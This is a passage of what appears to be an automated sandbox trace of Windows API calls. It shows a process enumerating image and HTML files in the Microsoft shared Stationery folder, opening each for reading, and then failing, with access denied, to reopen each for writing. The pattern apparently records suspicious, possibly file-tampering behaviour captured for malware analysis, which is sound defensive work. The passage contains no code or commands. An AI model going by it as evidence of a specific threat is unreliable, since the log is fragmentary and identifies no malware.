lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0087.132] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.133] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.133] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.133] CloseHandle (hObject=0x348) returned 1 [0087.133] AreFileApisANSI () returned 1 [0087.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0087.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85300 [0087.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 76 [0087.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.133] GetLastError () returned 0x5 [0087.133] GetLastError () returned 0x5 [0087.133] SetLastError (dwErrCode=0x5) [0087.133] GetLastError () returned 0x5 [0087.133] SetLastError (dwErrCode=0x5) [0087.133] GetLastError () returned 0x5 [0087.133] SetLastError (dwErrCode=0x5) [0087.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0087.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.134] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="GreenBubbles.jpg", cAlternateFileName="")) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0087.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0087.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.134] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.135] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.135] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.135] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.135] AreFileApisANSI () returned 1 [0087.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg", lpUsedDefaultChar=0x0) returned 75 [0087.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0087.135] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.135] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0087.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.135] AreFileApisANSI () returned 1 [0087.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85440 [0087.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 75 [0087.135] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.138] GetFileType (hFile=0x424) returned 0x1 [0087.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0087.138] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.138] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.138] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.138] CloseHandle (hObject=0x424) returned 1 [0087.139] AreFileApisANSI () returned 1 [0087.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x859e0 [0087.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 75 [0087.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.139] GetLastError () returned 0x5 [0087.139] GetLastError () returned 0x5 [0087.139] SetLastError (dwErrCode=0x5) [0087.139] GetLastError () returned 0x5 [0087.139] SetLastError (dwErrCode=0x5) [0087.139] GetLastError () returned 0x5 [0087.139] SetLastError (dwErrCode=0x5) [0087.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0087.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0087.139] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.139] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.139] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Hand Prints.htm", cAlternateFileName="")) returned 1 [0087.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.140] AreFileApisANSI () returned 1 [0087.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm", lpUsedDefaultChar=0x0) returned 74 [0087.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0087.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.141] AreFileApisANSI () returned 1 [0087.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0087.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85d00 [0087.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 74 [0087.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.142] GetFileType (hFile=0x424) returned 0x1 [0087.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0087.142] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.142] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.142] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.142] CloseHandle (hObject=0x424) returned 1 [0087.143] AreFileApisANSI () returned 1 [0087.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0087.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85ee0 [0087.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 74 [0087.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.143] GetLastError () returned 0x5 [0087.143] GetLastError () returned 0x5 [0087.143] SetLastError (dwErrCode=0x5) [0087.143] GetLastError () returned 0x5 [0087.143] SetLastError (dwErrCode=0x5) [0087.143] GetLastError () returned 0x5 [0087.143] SetLastError (dwErrCode=0x5) [0087.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0087.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0087.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.143] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="HandPrints.jpg", cAlternateFileName="")) returned 1 [0087.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0087.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.144] AreFileApisANSI () returned 1 [0087.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg", lpUsedDefaultChar=0x0) returned 73 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0087.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0087.145] AreFileApisANSI () returned 1 [0087.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0087.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0087.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 73 [0087.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.340] GetFileType (hFile=0x348) returned 0x1 [0087.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0087.340] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, 